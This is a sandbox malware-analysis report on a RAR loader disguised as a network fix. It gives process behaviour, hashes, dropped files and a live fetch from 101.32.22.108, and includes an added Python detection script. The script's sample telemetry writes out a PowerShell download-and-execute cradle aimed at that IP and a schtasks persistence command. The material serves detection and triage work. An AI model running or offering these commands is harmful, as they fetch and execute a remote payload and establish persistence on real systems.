File name: HttpNetword_Fix.rar

Full analysis: https://app.any.run/tasks/37d8b38c-3d49-4d19-91d6-51075d3d0d5e
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: July 04, 2025, 14:57:25
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
arch-exec
loader
delphi
inno
installer
auto
generic
Indicators:
MIME: application/x-rar
File info: RAR archive data, v5
MD5: E259140EEADED9A8B5FCCC481CC14819
SHA1: 8BC4371983DDFD1BB2A21BE23FD2CE788C192685
SHA256: 837AAECB4D3D06C90B4955E525FB3E8EEDBED0E6F46EA8D383815E0D60957579
SSDEEP: 98304:l+w4SphcigRHL2w0D2SqZviAWX+M2uR22sLxTSGzX92wQgvTTCGt66F2ZfNDAdXQ:c3y9

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executing a file with an untrusted certificate

      • smss.exe (PID: 4888)
      • smss.exe (PID: 4644)
      • smss.exe (PID: 888)
      • smss.exe (PID: 4676)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 4816)
      • powershell.exe (PID: 6768)
      • powershell.exe (PID: 5020)
      • powershell.exe (PID: 7108)
    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 4520)
      • powershell.exe (PID: 4816)
      • cmd.exe (PID: 4460)
    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 4816)
      • powershell.exe (PID: 5244)
    • GENERIC has been found (auto)

      • powershell.exe (PID: 5244)
    • Uses Task Scheduler to run other applications

      • cmd.exe (PID: 4460)
  • SUSPICIOUS

    • The process drops C-runtime libraries

      • WinRAR.exe (PID: 4788)
    • Process drops legitimate windows executable

      • WinRAR.exe (PID: 4788)
      • cmd.exe (PID: 4460)
    • Reads security settings of Internet Explorer

      • smss.exe (PID: 4888)
      • 1Htest.tmp (PID: 4764)
      • smss.exe (PID: 4644)
      • WinRAR.exe (PID: 4788)
      • smss.exe (PID: 888)
      • smss.exe (PID: 4676)
    • Executes application which crashes

      • smss.exe (PID: 4888)
      • smss.exe (PID: 4644)
      • smss.exe (PID: 888)
      • smss.exe (PID: 4676)
    • Executable content was dropped or overwritten

      • 1Htest.exe (PID: 5716)
      • 1Htest.exe (PID: 2320)
      • 1Htest.tmp (PID: 3952)
      • powershell.exe (PID: 6768)
      • unins000.exe (PID: 3788)
      • cmd.exe (PID: 4460)
      • _iu14D2N.tmp (PID: 5060)
    • Reads the Windows owner or organization settings

      • 1Htest.tmp (PID: 3952)
      • _iu14D2N.tmp (PID: 5060)
    • Starts CMD.EXE for commands execution

      • 1Htest.tmp (PID: 3952)
      • powershell.exe (PID: 6768)
      • WinRAR.exe (PID: 4788)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 4520)
      • powershell.exe (PID: 4816)
      • cmd.exe (PID: 4460)
    • Found IP address in command line

      • powershell.exe (PID: 4816)
      • powershell.exe (PID: 5244)
    • Possibly malicious use of IEX has been detected

      • cmd.exe (PID: 4520)
    • Connects to the server without a host name

      • powershell.exe (PID: 4816)
      • powershell.exe (PID: 6768)
      • powershell.exe (PID: 5244)
    • Likely accesses (executes) a file from the Public directory

      • powershell.exe (PID: 6768)
    • The process executes Powershell scripts

      • powershell.exe (PID: 4816)
      • cmd.exe (PID: 4460)
    • Process requests binary or script from the Internet

      • powershell.exe (PID: 4816)
      • powershell.exe (PID: 6768)
      • powershell.exe (PID: 5244)
    • Application launched itself

      • powershell.exe (PID: 4816)
    • Downloads file from URI via Powershell

      • powershell.exe (PID: 5244)
    • Potential Corporate Privacy Violation

      • powershell.exe (PID: 6768)
    • Executing commands from a ".bat" file

      • powershell.exe (PID: 6768)
      • WinRAR.exe (PID: 4788)
    • The process executes via Task Scheduler

      • rundll32.exe (PID: 2428)
      • smss.exe (PID: 4644)
      • smss.exe (PID: 888)
      • smss.exe (PID: 4676)
    • Detected use of alternative data streams (AltDS)

      • _iu14D2N.tmp (PID: 5060)
    • Starts itself from another location

      • unins000.exe (PID: 3788)
    • Starts application with an unusual extension

      • unins000.exe (PID: 3788)
    • Connects to unusual port

      • mmgaserver.exe (PID: 1336)
    • The process creates files with name similar to system file names

      • cmd.exe (PID: 4460)
    • Uses TASKKILL.EXE to kill process

      • _iu14D2N.tmp (PID: 5060)
  • INFO

    • Manual execution by a user

      • smss.exe (PID: 4888)
      • setup安装6.exe (PID: 684)
      • setup安装6.exe (PID: 4684)
      • 1Htest.exe (PID: 5716)
    • The sample compiled with english language support

      • WinRAR.exe (PID: 4788)
      • cmd.exe (PID: 4460)
    • Checks supported languages

      • smss.exe (PID: 4888)
      • setup安装6.exe (PID: 4684)
      • 1Htest.exe (PID: 5716)
      • 1Htest.tmp (PID: 4764)
      • 1Htest.exe (PID: 2320)
      • 1Htest.tmp (PID: 3952)
      • unins000.exe (PID: 3788)
      • _iu14D2N.tmp (PID: 5060)
      • smss.exe (PID: 4644)
      • MpCmdRun.exe (PID: 952)
      • smss.exe (PID: 888)
      • smss.exe (PID: 4676)
    • Reads the computer name

      • smss.exe (PID: 4888)
      • 1Htest.tmp (PID: 4764)
      • 1Htest.tmp (PID: 3952)
      • unins000.exe (PID: 3788)
      • _iu14D2N.tmp (PID: 5060)
      • smss.exe (PID: 4644)
      • MpCmdRun.exe (PID: 952)
      • smss.exe (PID: 888)
      • smss.exe (PID: 4676)
    • Checks proxy server information

      • smss.exe (PID: 4888)
      • WerFault.exe (PID: 5424)
      • powershell.exe (PID: 4816)
      • powershell.exe (PID: 6768)
      • powershell.exe (PID: 5244)
      • rundll32.exe (PID: 2428)
      • WerFault.exe (PID: 6368)
      • smss.exe (PID: 4644)
      • WerFault.exe (PID: 760)
      • slui.exe (PID: 4664)
      • smss.exe (PID: 4676)
      • smss.exe (PID: 888)
      • WerFault.exe (PID: 2760)
    • Reads the machine GUID from the registry

      • smss.exe (PID: 4888)
      • smss.exe (PID: 4644)
      • smss.exe (PID: 888)
      • smss.exe (PID: 4676)
    • Reads the software policy settings

      • smss.exe (PID: 4888)
      • WerFault.exe (PID: 5424)
      • WerFault.exe (PID: 6368)
      • smss.exe (PID: 4644)
      • slui.exe (PID: 4664)
      • WerFault.exe (PID: 760)
      • smss.exe (PID: 4676)
      • smss.exe (PID: 888)
      • WerFault.exe (PID: 2760)
    • Create files in a temporary directory

      • 1Htest.exe (PID: 5716)
      • 1Htest.exe (PID: 2320)
      • 1Htest.tmp (PID: 3952)
      • unins000.exe (PID: 3788)
      • _iu14D2N.tmp (PID: 5060)
      • MpCmdRun.exe (PID: 952)
    • Creates files or folders in the user directory

      • WerFault.exe (PID: 5424)
      • rundll32.exe (PID: 2428)
      • WerFault.exe (PID: 6368)
      • WerFault.exe (PID: 760)
      • WerFault.exe (PID: 2760)
    • The sample compiled with chinese language support

      • 1Htest.exe (PID: 5716)
      • 1Htest.tmp (PID: 3952)
      • 1Htest.exe (PID: 2320)
      • unins000.exe (PID: 3788)
      • WinRAR.exe (PID: 4788)
    • Process checks computer location settings

      • 1Htest.tmp (PID: 4764)
      • _iu14D2N.tmp (PID: 5060)
    • Creates files in the program directory

      • 1Htest.tmp (PID: 3952)
      • powershell.exe (PID: 6768)
      • cmd.exe (PID: 4460)
    • Creates a software uninstall entry

      • 1Htest.tmp (PID: 3952)
    • Disables trace logs

      • powershell.exe (PID: 4816)
      • powershell.exe (PID: 6768)
      • powershell.exe (PID: 5244)
    • Detects InnoSetup installer (YARA)

      • 1Htest.tmp (PID: 3952)
    • Compiled with Borland Delphi (YARA)

      • 1Htest.tmp (PID: 3952)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 5020)
      • powershell.exe (PID: 7108)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 5020)
      • powershell.exe (PID: 7108)
    • Reads security settings of Internet Explorer

      • rundll32.exe (PID: 2428)
    • Executable content was dropped or overwritten

      • WinRAR.exe (PID: 4788)
No Malware configuration.

TRiD

.rar | RAR compressed archive (v5.0) (61.5)
.rar | RAR compressed archive (gen) (38.4)

EXIF

ZIP (ExifTool's tag group for ZIP-family archives, under which it also reports RAR; the file itself is RAR v5)

FileVersion: RAR v5
CompressedSize: 1057931
UncompressedSize: 1717385
OperatingSystem: Win32
ArchivedFileName: HttpNetword_Fix/1Htest.exe
Total processes: 185
Monitored processes: 37
Malicious processes: 9
Suspicious processes: 5

Behavior graph

Processes shown in the behavior graph, in display order ("no specs" marks a process for which no indicators were recorded):
winrar.exe, smss.exe, werfault.exe, setup安装6.exe (no specs), setup安装6.exe, conhost.exe (no specs), 1htest.exe, 1htest.tmp (no specs), 1htest.exe, 1htest.tmp, cmd.exe (no specs), conhost.exe (no specs), powershell.exe, powershell.exe, cmd.exe, conhost.exe (no specs), powershell.exe (#GENERIC), powershell.exe (no specs), powershell.exe (no specs), schtasks.exe (no specs), schtasks.exe (no specs), rundll32.exe, unins000.exe, _iu14d2n.tmp, taskkill.exe (no specs), conhost.exe (no specs), mmgaserver.exe, smss.exe, werfault.exe, slui.exe, cmd.exe (no specs), conhost.exe (no specs), mpcmdrun.exe (no specs), smss.exe, werfault.exe, smss.exe, werfault.exe

Process information

Columns: PID, CMD, Path, Indicators, Parent process (indicators are not reproduced in this text export)
PID:
420
CMD:
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path:
C:\Windows\System32\conhost.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID:
684
CMD:
"C:\Users\admin\Desktop\setup安装6.exe"
Path:
C:\Users\admin\Desktop\setup安装6.exe
Parent process:
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
3221226540 (0xC000042C, STATUS_ELEVATION_REQUIRED)
Modules
Images
c:\users\admin\desktop\setup安装6.exe
c:\windows\system32\ntdll.dll
PID:
760
CMD:
C:\WINDOWS\SysWOW64\WerFault.exe -u -p 888 -s 1928
Path:
C:\Windows\SysWOW64\WerFault.exe
Parent process:
smss.exe (PID 888, the faulting process named by -p)
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Problem Reporting
Exit code:
0
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\werfault.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
PID:
888
CMD:
"C:\Users\admin\Desktop\smss.exe"
Path:
C:\Users\admin\Desktop\smss.exe
Parent process:
svchost.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
3221225477 (0xC0000005, STATUS_ACCESS_VIOLATION; the crash reported by WerFault.exe PID 760)
Modules
Images
c:\users\admin\desktop\smss.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\ole32.dll
c:\windows\syswow64\ucrtbase.dll
PID:
952
CMD:
"C:\Program Files\Windows Defender\MpCmdRun.exe" -Scan -ScanType 3 -File "C:\Users\admin\AppData\Local\Temp\Rar$VR4788.41405"
Path:
C:\Program Files\Windows Defender\MpCmdRun.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Malware Protection Command Line Utility
Exit code:
2
Version:
4.18.1909.6 (WinBuild.160101.0800)
Modules
Images
c:\program files\windows defender\mpcmdrun.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
PID:
1336
CMD:
mmgaserver.exe
Path:
C:\Windows\SysWOW64\mmgaserver.exe
Parent process:
rundll32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
MMGA Server
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\mmgaserver.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\win32u.dll
PID:
2320
CMD:
"C:\Users\admin\Desktop\1Htest.exe" /SPAWNWND=$7033C /NOTIFYWND=$F0330
Path:
C:\Users\admin\Desktop\1Htest.exe
Parent process:
1Htest.tmp
User:
admin
Company:
Integrity Level:
HIGH
Description:
静默安装测试包 Setup (Chinese: "Silent Installation Test Package" Setup)
Exit code:
0
Version:
Modules
Images
c:\users\admin\desktop\1htest.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\user32.dll
PID:
2428
CMD:
"C:\WINDOWS\SysWOW64\rundll32.exe" C:\Users\admin\AppData\Local\Microsoft\ExecutionHuiOne\ExecutionHuiOne.dll,EntryHUIOne
Path:
C:\Windows\SysWOW64\rundll32.exe
Parent process:
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\rundll32.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\aclayers.dll
PID:
2632
CMD:
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path:
C:\Windows\System32\conhost.exe
Parent process:
taskkill.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID:
2668
CMD:
C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\Rar$VR4788.41405\Rar$Scan51498.bat" "
Path:
C:\Windows\System32\cmd.exe
Parent process:
WinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
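The indicator list and the process table above describe a chain a detection engineer would want to encode: cmd.exe launching PowerShell with its execution policy bypassed, a download cradle pointed at an IP literal, a binary named smss.exe running from the Desktop, and rundll32.exe loading ExecutionHuiOne.dll from AppData under a scheduled task. The Python below is an added example, not part of the ANY.RUN report and not the sample's code; it applies those rules to Sysmon-style process-creation events. The command lines for PIDs 420, 2668, 952, 2428 and 888 are copied from the process table; the PowerShell and schtasks command lines (PIDs 4816 and 5100), the "HuiOneUpdate" task name and the integrity level of the constructed rows are assumptions chosen to match the behaviour the signatures describe.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-creation record, in the shape Sysmon event 1 or EDR telemetry provides."""
    pid: int
    image: str            # full path of the started executable
    cmdline: str          # full command line
    parent_image: str     # parent's image name or full path
    integrity: str = "MEDIUM"


# Native Windows binaries that legitimately run only from the system directories.
SYSTEM_IMAGE_NAMES = {"smss.exe", "csrss.exe", "wininit.exe", "winlogon.exe",
                      "services.exe", "lsass.exe", "svchost.exe", "explorer.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")

DOTTED_QUAD = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|net\.webclient", re.I)
EXEC_POLICY_BYPASS = re.compile(r"-(?:e|ep|ex|exec|executionpolicy)\s+bypass", re.I)
IEX = re.compile(r"\biex\b|invoke-expression", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def args_after_image(cmdline: str) -> str:
    """Drop the leading image token (quoted or bare) and return the remaining arguments."""
    m = re.match(r'\s*(?:"[^"]*"|\S+)\s*(.*)$', cmdline)
    return m.group(1) if m else ""


def evaluate(ev: ProcEvent) -> list:
    """Return the rule descriptions this single event trips (empty for clean events)."""
    findings = []
    img, parent = basename(ev.image), basename(ev.parent_image)
    path, cl = ev.image.lower(), ev.cmdline

    if img in ("powershell.exe", "pwsh.exe"):
        if EXEC_POLICY_BYPASS.search(cl):
            findings.append("PowerShell started with execution policy Bypass")
        if parent == "cmd.exe":
            findings.append("PowerShell spawned by cmd.exe")
        if DOWNLOAD_CRADLE.search(cl):
            if IEX.search(cl):
                findings.append("download cradle fed to Invoke-Expression")
            if DOTTED_QUAD.search(cl):
                findings.append("download from an IP-literal host")

    if img in SYSTEM_IMAGE_NAMES and not path.startswith(SYSTEM_DIRS):
        findings.append(f"system binary name {img} running from {ev.image}")

    if img == "rundll32.exe":
        # First argument is "<dll>,<export>"; flag DLLs loaded from user-writable paths.
        target = (args_after_image(cl).split() or [""])[0].strip('"')
        dll, _, entry = target.partition(",")
        if dll.lower().startswith(USER_WRITABLE):
            findings.append(f"rundll32 loading {dll} (export {entry or 'none'}) from a user-writable path")

    if img == "schtasks.exe" and "/create" in cl.lower():
        findings.append("scheduled task created with schtasks.exe")

    # The Task Scheduler service lives in svchost.exe, so task-launched binaries have it as parent.
    if parent == "svchost.exe" and path.startswith(USER_WRITABLE):
        findings.append("launched by svchost.exe (Task Scheduler service host) from a user-writable path")

    if findings and ev.integrity.upper() == "HIGH":
        findings.append("runs elevated (HIGH integrity)")
    return findings


def triage(events) -> dict:
    """Map PID -> findings for every event that tripped at least one rule."""
    return {ev.pid: f for ev in events if (f := evaluate(ev))}


# Sample telemetry. Rows marked "from report" copy command lines from the process table;
# rows marked "constructed" are invented to match the behaviour the signatures describe.
SAMPLE_EVENTS = [
    ProcEvent(420, "C:\\Windows\\System32\\conhost.exe",                                # from report
              "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1", "cmd.exe"),
    ProcEvent(2668, "C:\\Windows\\System32\\cmd.exe",                                   # from report
              'C:\\WINDOWS\\system32\\cmd.exe /c ""C:\\Users\\admin\\AppData\\Local\\Temp\\Rar$VR4788.41405\\Rar$Scan51498.bat" "',
              "WinRAR.exe"),
    ProcEvent(952, "C:\\Program Files\\Windows Defender\\MpCmdRun.exe",                # from report
              '"C:\\Program Files\\Windows Defender\\MpCmdRun.exe" -Scan -ScanType 3 -File "C:\\Users\\admin\\AppData\\Local\\Temp\\Rar$VR4788.41405"',
              "cmd.exe"),
    ProcEvent(4816, "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",  # constructed
              "powershell.exe -ExecutionPolicy Bypass -NoProfile -Command "
              "\"IEX (New-Object Net.WebClient).DownloadString('http://101.32.22.108/1/1h.txt')\"",
              "cmd.exe"),
    ProcEvent(5100, "C:\\Windows\\System32\\schtasks.exe",                              # constructed (PID, task name)
              'schtasks.exe /create /f /sc minute /mo 1 /tn "HuiOneUpdate" '
              '/tr "rundll32.exe C:\\Users\\admin\\AppData\\Local\\Microsoft\\ExecutionHuiOne\\ExecutionHuiOne.dll,EntryHUIOne"',
              "cmd.exe"),
    ProcEvent(2428, "C:\\Windows\\SysWOW64\\rundll32.exe",                              # from report
              '"C:\\WINDOWS\\SysWOW64\\rundll32.exe" C:\\Users\\admin\\AppData\\Local\\Microsoft\\ExecutionHuiOne\\ExecutionHuiOne.dll,EntryHUIOne',
              "svchost.exe", "HIGH"),
    ProcEvent(888, "C:\\Users\\admin\\Desktop\\smss.exe",                               # from report
              '"C:\\Users\\admin\\Desktop\\smss.exe"', "svchost.exe"),
]

if __name__ == "__main__":
    for pid, hits in triage(SAMPLE_EVENTS).items():
        print(pid, "->", "; ".join(hits))
```

Run it directly to print the findings per PID; the WinRAR scan hook (cmd.exe 2668 and MpCmdRun.exe 952) and conhost.exe stay clean, which is the false-positive check worth keeping. The svchost.exe-parent rule is the one that needs the most tuning in a real estate: every task-launched binary has that parent, so the rule is scoped to user-writable paths rather than to the parent alone.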
Total events: 69 047
Read events: 69 003
Write events: 43
Delete events: 1

Modification events

(PID) Process: (4788) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation: write
Name: 3
Value: C:\Users\admin\Desktop\preferences.zip

(PID) Process: (4788) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation: write
Name: 2
Value: C:\Users\admin\Desktop\chromium_ext.zip

(PID) Process: (4788) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation: write
Name: 1
Value: C:\Users\admin\Desktop\omni_23_10_2024_.zip

(PID) Process: (4788) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation: write
Name: 0
Value: C:\Users\admin\Desktop\HttpNetword_Fix.rar

(PID) Process: (4788) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation: write
Name: name
Value: 120

(PID) Process: (4788) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation: write
Name: size
Value: 80

(PID) Process: (4788) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation: write
Name: type
Value: 120

(PID) Process: (4788) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation: write
Name: mtime
Value: 100

(PID) Process: (4788) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList
Operation: write
Name: ArcSort
Value: 32

(PID) Process: (3952) 1Htest.tmp
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\静默安装测试包_is1
Operation: write
Name: Inno Setup: Setup Version
Value: 6.2.0

ArcHistory is WinRAR's recent-archive list: entry 0 is this sample, entries 1-3 are older history entries for archives opened before it. The FileColumnWidths and ArcSort writes are WinRAR UI state. The only registry write attributable to the sample itself in this excerpt is the Inno Setup uninstall key created by the installer (PID 3952).
Executable files: 18
Suspicious files: 6
Text files: 26
Unknown types: 5

Dropped files

Columns: PID, Process, Filename, Type (followed by MD5 and SHA256 where computed)
PID: 5424
Process: WerFault.exe
Filename: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_smss.exe_24a43df87c62da7d4242a72fa816da0ac8962_d7e1bf78_69a36f8b-afd3-425b-86bc-39aa830800f0\Report.wer
Type:
MD5:
SHA256:

PID: 3952
Process: 1Htest.tmp
Filename: C:\Program Files (x86)\csDemo\unins000.exe
Type: executable
MD5: 86D32F3E0F58A0B23FB970B661F1F02D
SHA256: 71E42F1916C9CEC1F7F151E950E8594A41752F91708E5F33B99EFE0252B637B5

PID: 2320
Process: 1Htest.exe
Filename: C:\Users\admin\AppData\Local\Temp\is-OOLK4.tmp\1Htest.tmp
Type: executable
MD5: DBC4BDA50ED3CEECDC51CB85B80FD698
SHA256: C78A8AC45604D237CA62486F4305A8CFAD1E4A8843A7EFE06384CD570D4966B0

PID: 5424
Process: WerFault.exe
Filename: C:\ProgramData\Microsoft\Windows\WER\Temp\WER6AFE.tmp.dmp
Type: dmp
MD5: 2DE0284902D08A334185402BEE2BD7AE
SHA256: F4D14E5048BDD912F88DDC1DD6170FCA753A39AB89DA2E4ACECF2C41EB7C7740

PID: 5424
Process: WerFault.exe
Filename: C:\ProgramData\Microsoft\Windows\WER\Temp\WER6BEB.tmp.xml
Type: xml
MD5: D61B236BE58808F9B5375755FA45230A
SHA256: E114D15330D5B48F68556B9445FABECE39FAA25A1711D514DD8291FE016D830F

PID: 5424
Process: WerFault.exe
Filename: C:\ProgramData\Microsoft\Windows\WER\Temp\WER6BDA.tmp.WERInternalMetadata.xml
Type: xml
MD5: 4E2234DDB82D12D6B897867E98062CA2
SHA256: A0609169D9D8C7EB634E1B41AB945457E7BD288EE94A7E7AE5D9EF98A89831A4

PID: 3952
Process: 1Htest.tmp
Filename: C:\Users\admin\AppData\Local\Temp\is-JN1PA.tmp\_isetup\_setup64.tmp
Type: executable
MD5: E4211D6D009757C078A9FAC7FF4F03D4
SHA256: 388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95

PID: 4816
Process: powershell.exe
Filename: C:\Users\Public\Documents\1h.ps1
Type: text
MD5: 28E8F7FB40F602B54AB47A699A853741
SHA256: 39DDBDCC117673EEECCD18FA7617E712BD8E609AB3952CF35931814C766D486F

PID: 6768
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_od0kfq4h.mph.psm1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 6768
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_v5dm3cmj.u3b.ps1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

Ten of the 55 files are listed. The __PSScriptPolicyTest_*.ps1/.psm1 pair is written by PowerShell itself at startup to probe AppLocker/WDAC script enforcement (same content, hence the identical hashes) and is not attacker content; _setup64.tmp is the Inno Setup 64-bit helper. The artifacts of interest here are 1h.ps1, written by PID 4816 to the world-readable C:\Users\Public\Documents right after it fetched 1h.txt (see HTTP requests), and the installer's uninstaller unins000.exe under C:\Program Files (x86)\csDemo.
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 46
TCP/UDP connections: 69
DNS requests: 26
Threats: 16

HTTP requests

PID | Process | Method | HTTP code | IP | URL | CN | Type | Size | Reputation
4860 | RUXIMICS.exe | GET | 200 | 2.16.168.124:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | RU | binary | 825 b | whitelisted
1268 | svchost.exe | GET | 200 | 2.16.168.124:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | RU | binary | 825 b | whitelisted
1268 | svchost.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | NL | binary | 814 b | whitelisted
- | - | POST | 200 | 40.126.31.128:443 | https://login.live.com/RST2.srf | US | xml | 1.24 Kb | whitelisted
4860 | RUXIMICS.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | NL | binary | 814 b | whitelisted
- | - | POST | 400 | 20.190.159.2:443 | https://login.live.com/ppsecure/deviceaddcredential.srf | US | text | 203 b | whitelisted
- | - | POST | 400 | 20.190.159.2:443 | https://login.live.com/ppsecure/deviceaddcredential.srf | US | text | 203 b | whitelisted
- | - | POST | 400 | 20.190.159.71:443 | https://login.live.com/ppsecure/deviceaddcredential.srf | US | text | 203 b | whitelisted
- | - | POST | 400 | 40.126.31.1:443 | https://login.live.com/ppsecure/deviceaddcredential.srf | US | text | 203 b | whitelisted
4816 | powershell.exe | GET | 200 | 101.32.22.108:80 | http://101.32.22.108/1/1h.txt | HK | text | 245 b | unknown

